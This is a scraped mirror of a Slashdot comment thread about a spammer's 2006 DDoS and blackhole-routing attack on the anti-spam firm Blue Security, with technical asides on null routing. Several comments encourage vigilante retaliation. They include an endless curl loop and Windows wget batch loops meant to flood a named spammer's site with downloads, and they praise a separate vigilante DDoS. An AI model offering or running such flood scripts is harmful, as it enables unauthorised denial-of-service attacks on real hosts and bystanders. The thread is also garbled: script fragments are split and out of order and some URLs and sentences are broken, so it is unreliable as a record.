Slashdot Mirror
What Happened to Blue Security
shadowknot writes "Blue Security has published a detailed account of the attack on their servers perpetrated by spammer "PharmaMaster". The attack included a DDoS attack on the Blue Security operational system and a Black Hole filtering attack on the Blue Security website. From the article: "The first attack was to block worldwide access to Blue Security's corporate website (www.bluesecurity.com) by tampering with the Internet backbone using a technique called "Blackhole Filtering". The Second attack was a DDoS attack on Blue Security's operational system."
They deserve a break.
Slashdot Burying Stories About Slashdot Media Owned
[May 3rd 16:43 GMT]
PharmaMaster Strikes Again, Takes Down Tucows
PharmaMaster starts another attack and takes down Tucows's DNS servers which were serving thousands of sites, including Blue Security's. Tucows terminates Blue Security's account in an attempt to stop the attack.
And it was't all that long ago that DNS vulnerabilities were under discussion. Attacking a DNS server not only takes out the site intended, it has the bonus of collateral damage. Imagine the chagrin of all the other sites served by Tucows when they all go down en masse and imagine the PR campaign that Blue Security is going to have to wage to get any credibility back.
GetOuttaMySpace - The Anti-Social Network
Someone used their tool to clean a list, then compared the clean list to a "pre-scrub" list, which means they didn't gain any email addresses, they just learned something about the emails they already had been sending spam to.
Don't quit Blue Security. My philosophy boils down to "millions for defense, not a penny for tribute" (Jefferson).
The forum that organized (or at least helped in) the attack is located here, but I think it's still down. It was nailed by a deliberate vigilante DDoS from about a hundred or so Digg members yesterday/last night. They hacked a university to host it after the first host got nailed. Not sure what happened after that.
shameless from digg, but an easy redirect for /.ers without having to read digg's stuff:
information week's take on it makes it seem less, well, amazing on the part of the spammers.
http://www.informationweek.com/story/showArticle.j html?articleID=187200875
My thoughts exactly.
1 /23.html
A Google search showed this slide: http://www.soi.wide.ad.jp/class/20040013/slides/1
Based on that slide, I think that Israeli BGP routers were hacked, adding a null route for the BleuSecurity IPs.
I could be wrong (in fact, I'd bet I am).
This is what annoys me. What are they thinking? They're helping spammers listwash. The fact that a spammer can simply use a diff of his lists before vs. after to find out who's using the service is trivial; the larger point is that even after the list has been purged of BlueSecurity users, the spammer is still spamming. It's addressing only a symptom, not the cause.
They should say to the spammers 'if you continue to spam the addresses of our subscribers, we will continue to jam your unsubscribe addresses and drop boxes with garbage messages, one per spam email received. No, we're not telling you which addresses these are. Stop sending all mail to all addresses for which you do not have a confirmed opt-in, and you will have no further trouble from us.'
That way they're not helping the spammers continue to spam, and I'd feel a lot better about them.
Real Daleks don't climb stairs - they level the building.
Those spammers will threat e-mails if you unsubscribe or not, so don't unsubscribe. They're doing this because it's hurting it in their pocket. Big deal. I don't give a damn if a spammer can't buy a new humvee limo, and I don't have to support those scumbags. So if they want to fill my mailbox with with their trash, so be it. I will not bend over to them. I will not unsubscribe. I will not let those fscking bastards tell me what I should do.
PharmaMaster is an IM and forum handle. He's a major spammer, and probably responsible for at least some of that junk in my google mailbox's junk folder right now. He is apparently working with a cartel of spammers to try to crush anti-spam attempts. Interesting reading about their planning on the specialham.com spammer's forum was mirrored online somewhere yesterday, but got taken down for some reason.
An InfoWorld article from May 4th quoted Blue Security CEO Eran Reshef as saying:
Since Blue Security is now referring to "tier-1 ISP name withheld", that means one of several things:Gamingmuseum.com: Give your 3D accelerator a rest.
If you must!
I don't think windows has a similar function readily available.
Try "nul:", as in "rmdir banana >nul:"
That thread is great ... I wonder about the Oslo university thing (that's where they've now moved their server to). If anyone here speaks Norwegian and wanted to write them a letter, contact info is on the Digg page. I'm surprised it hasn't gotten taken down already, but maybe the sysop there doesn't read English (I assume all the Digg'ers have been writing in English...).
:; do curl -o /dev/null http://www.northworks.biz/install_mc_shareware.exe ; done
They also read through the forums and found some of the actual spammers' websites:
http://www.northworks.biz/ This one is one of the shadiest, they're selling email harvesters.
In case anyone wants to take matters into their own hands, as one of the Digg people pointed out, there's always:
while
His bandwidth bill is going to suck this month...
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
for windows users via a proxy:
:starte --proxy-user
:starte
:-)
@echo off
set http_proxy=http://yourproxyhereifapplicable
rem remove the above if you don't have a proxy server
wget http://www.northworks.biz/install_mc_shareware.ex
=username --proxy-pass=password
goto start
without a proxy:
@echo off
wget http://www.northworks.biz/install_mc_shareware.ex
goto start
(save as s batch file in the same dir as wget)
download wget from www.gnu.org/software/wget/
have fun
A variation of this technique is to route packets to an internal "blackhole router" instead of to Null0. This consumes a little more resources than the Null0 option but still far less than an ACL. The blackhole router does nothing else other than null routing the traffic. It can also be used to route the traffic to a sniffing device to give the admin an opportunity to see what the malicious traffic really was. The blackhole router can also advertise internally the blackhole routes. This is useful when you network policy prohibits making changes to critical hardware such as a border router without sufficient peer review. Often when you must null route something you must do it in a hurry (ie, a customer is being attacked). Being able to make the changes on a non-critical box (the blackhole router) and having the routes changes propgate up to a critical piece of hardware (the border router(s)) is very useful.
Another reason to use them is to prevent routing loops. Lets say for example you have an access server terminating dialin customers. You've loaded out your AS with 192 modems. A /24 has been allocated for this AS. Your AS advertises that /24 with OSPF back into the core of your ISP network. However the AS's routing table doesn't contain a route for all 253 of the useable IPs in that /24. Instead individual routes are added as individual users dial in. Lets say a packet comes in that's destined for an IP that isn't in use. The AS looks at its routing table and says to itself that it doesn't have a route to that IP. It falls back on its default route which is the router upstream of the AS that just routed the packet to the AS. Rinse and repeat. A routing loop ensues.
Sometimes in BGP you have to have a static route to a given netblock to turn around and advertise it. You already have internal routes that would ultimately route the packet to the right destination. However to get BGP working you have to create a specific route. You can simply create a static route to that subnet via Null0 with a cost of 254 and make BGP happy.
There are dozens of examples of why you need null routing. Does that help? You can search on Cisco's website for additional references.
Well it certainly hasn't doubled but it did get roughly a 20% increase. They were just a tad over 400K when they got everything back online. Their site currently shows 471,266 as the number of registered users.
If you must!
Posted A/C (despite deserving karma for hauling this crap past the lameness filter), because I cannot verify that this is the content from the specialham.com forums; the original forum posting thread (indicated via digg) has been removed and disavowed by the forum maintainer. However, Googling for a couple phrases that were quoted on Digg turned this up:
Only for some type of spam, message placement will still go out.
Stuff like Political ads and prosletyzing where no response is needed
will still go out. But anyone trying to sell some questionable product
from a website or email drop is not going to want to get hammered with the
return of a big percentage of the spam emails.
Phishing and other forms of identity theft are also going to be a lot harder.
If you go to the Bluesecurity site, you'll see they have multiple classes
of spam and responses to each class. Some stuff gets bounced to the FDA, some
to the BSA, even some to MPAA. Childporn looks like it goes to Interpol.
I have no illusions that it will get rid of ALL spam, but it will put the hurt on some spammers and that's 100% better than just trying to filter or ignore the incoming spam.
Starman97@Gmail.com (bring it on spammers)
The client is only for convenience and is optional. You can sign up for an account and forward your spam (as body or attachment) to username@reports.bluesecurity.com.